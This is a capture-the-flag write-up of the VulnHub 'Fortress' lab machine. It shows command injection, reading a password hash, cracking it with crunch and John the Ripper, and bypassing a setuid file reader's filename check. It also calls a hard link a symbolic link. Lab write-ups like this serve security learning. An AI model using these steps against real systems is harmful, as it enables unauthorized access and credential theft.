18 January 2022

Pentesting Fun Stuff

following the cyber security path…

DC416 CTF CHALLENGES [FORTRESS]

Location

https://download.vulnhub.com/dc416-2016/dc416-fortress.ova

Introduction

This is one of  four virtual machines that were created by members of the VulnHub CTF Team for DefCon Toronto’s first offline CTF.
This machine was created by superkojiman
Each machine has a landing page on port 80 which describes the number of flags it has, along with any additional rules or hints.

Getting Started

First a nmap scan.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.3
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-10 09:56 CET
Nmap scan report for 192.168.171.3
Host is up (0.00049s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
| ssh-hostkey:
|   2048 3a:34:82:2b:86:e3:2a:e4:2c:34:18:85:f9:94:7c:69 (RSA)
|_  256 78:79:e2:ed:27:e3:43:77:0b:07:d2:03:bb:7f:c1:02 (ECDSA)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
|_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
|_http-title: Did not follow redirect to https://192.168.171.3/
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
|_http-title: fortress
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=ON/countryName=CA
| Not valid before: 2016-11-05T05:05:36
|_Not valid after:  2017-11-05T05:05:36
|_ssl-date: TLS randomness does not represent time
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.63 seconds

Looks like there are 3 open ports. And port 80 is redirecting to port 443.
I’ll try and do some banner grabbing before I start with port 80.
Nothing there but the info I already got from the nmap scan.
When visiting the website on port 80 I get redirected to port 443. Here are the rules of engagement noted.

To enumerate some directories I use dirsearch which finds /scanner.php/.

┌─[n13mant@planetmars]─[~/Desktop/dirsearch]
└──╼ $python3 dirsearch.py -u "https://192.168.171.3/" -e php -w /home/n13mant/Documents/dirsearch/db/dicc.txt -f -F -r -x 403,404 -t 10
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 9914
Error Log: /home/n13mant/Documents/dirsearch/logs/errors-17-01-10_13-26-57.log
Target: https://192.168.171.3/
[13:26:57] Starting:
[13:27:32] 200 -  561B  - /index.html
[13:27:45] 200 -  370B  - /scanner.php
Task Completed


Looks like an excellent vector for remote code execution (RCE).
Because I want to know if I can append some arbitrary code I start to add some chars and see what the result is. After I use the pipe char (|) I get a pat on the back – much appreciated LOL.

Because I wanted to know what was happening behind the scene, I used Burpsuite to capture the traffic. From there I sent the request to the repeater and try to execute code by bypassing the filter. After some time I find out that a simple break did the trick.

Next I’m using the command ls -aRl.

drwxr-xr-x  4 root  wheel    512 Nov  9 20:24 .
drwxr-xr-x  6 root  wheel    512 Nov  9 19:58 ..
-rw-r--r--  1 root  wheel    561 Nov  8 23:51 index.html
drwxr-xr-x  2 root  wheel    512 Nov  9 20:22 k1ngd0m_k3yz
-rw-r--r--  1 root  wheel  44867 Nov  4 00:46 logo.png
drwxr-xr-x  2 root  wheel    512 Nov  9 20:22 s1kr3t
-rw-r--r--  1 root  wheel    759 Nov  5 00:50 scanner.php
-rw-r--r--  1 root  wheel    612 Nov  4 01:01 styles.css
./k1ngd0m_k3yz:
total 32
drwxr-xr-x  2 root  wheel  512 Nov  9 20:22 .
drwxr-xr-x  4 root  wheel  512 Nov  9 20:24 ..
-rw-r--r--  1 root  wheel  157 Nov  9 19:53 master
-rw-r--r--  1 root  wheel   47 Nov  9 19:54 passwd
./s1kr3t:
total 24
drwxr-xr-x  2 root  wheel  512 Nov  9 20:22 .
drwxr-xr-x  4 root  wheel  512 Nov  9 20:24 ..
-rw-r--r--  1 root  wheel   31 Nov  4 18:08 flag.txt
cat ./s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
cat ./k1ngd0m_k3yz/master
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh
cat ./k1ngd0m_k3yz/passwd
craven:*:1002:1002:User &:/home/craven:/bin/sh

So I got the first flag and the passwd and shadow file of user “craven”.
First I’m going to gather the location of the remaining flags.

find / -name "flag*"
/usr/local/www/apache24/data/s1kr3t/flag.txt
/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt
ls -lah /usr/home/vulnhub
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  1 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader
ls -lah /usr/home/craven
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
-rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
-r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt

So the flags I can’t read yet, but there are some files I can.

cat /usr/home/craven/hint.txt
Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.
cat /usr/home/craven/reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha

So…..the name of the pet is probably “qwerty”. Leaving my to create a list with crunch.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $crunch 10 10 -t %%%qwerty^ -o craven.lst
Crunch will now generate the following amount of data: 363000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 33000
crunch: 100% completed generating output

Now to load this up with John the Ripper.

┌─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $unshadow ./etc/passwd ./etc/shadow > mypasswd
┌─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $john mypasswd --wordlist=craven.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
931qwerty?       (craven)
1g 0:00:00:57 DONE (2017-01-10 14:46) 0.01740g/s 535.9p/s 535.9c/s 535.9C/s 930qwerty?..932qwerty>
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[✗]─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $john --show mypasswd
craven:931qwerty?:1002:1002:User &:/home/craven:/bin/sh
1 password hash cracked, 0 left

Now that I have the password it’s time to ssh my way in as “craven”.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh craven@192.168.171.3 -p 22
The authenticity of host '192.168.171.3 (192.168.171.3)' can't be established.
ECDSA key fingerprint is SHA256:ekOYTIfPK3fRGCYD3FHMkmfiN13ShRbk7a7gF0CIQd8.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/n13mant/.ssh/known_hosts).
Password for craven@fortress:
Last login: Tue Nov  8 19:52:08 2016 from 192.168.208.1
FreeBSD 11.0-RELEASE-p1 (GENERIC) #0 r306420: Thu Sep 29 01:43:23 UTC 2016
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier
Edit /etc/motd to change this login announcement.
Any user that is a member of the wheel group can use "su -" to simulate
a root login. You can add a user to the wheel group by editing /etc/group.
    -- Konstantinos Konstantinidis <kkonstan@duth.gr>

First I take my second flag.

$ pwd
/usr/home/craven
$ ls -lah
total 60
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
-rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
-r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Next stop is user “vulnhub” and his flag.

$ cd vulnhub
$ ls -lah
total 56
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  1 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader
$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped
$ ltrace reader
-sh: ltrace: not found
$ strings reader
/libexec/ld-elf.so.1
FreeBSD
FreeBSD
_Jv_RegisterClasses
libc.so.7
__progname
environ
printf
lstat
fopen
puts
strstr
sleep
_init_tls
fclose
memset
fgets
atexit
_end
FBSD_1.0
AWAVAUATSPI
ffff.
u*UH
fff.
%s [file to read]
Checking file type...
Symbolic links not allowed!
Checking if flag file...
flag
Nope. Can't let you have the flag.
Great! Printing file contents...
Win, here's your flag:

This time I run the program.

$ ./reader
./reader [file to read]
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.

Let’s do some testing first.

$ echo "testing" > /tmp/test.txt
$ ./reader /tmp/test.txt
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
testing
$ echo 'not the real flag' > /tmp/flag.txt
$ ./reader /tmp/flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.

So it’s basically just checking the filename. If it’s “flag” it will deny access to it. Else it will echo the content.
To bypass this mechanism I’m going to make a symbolic link to the real “flag.txt”.

$ ln /usr/home/vulnhub/flag.txt /tmp/needo
$ ./reader /tmp/needo
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}

And there is the final flag.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.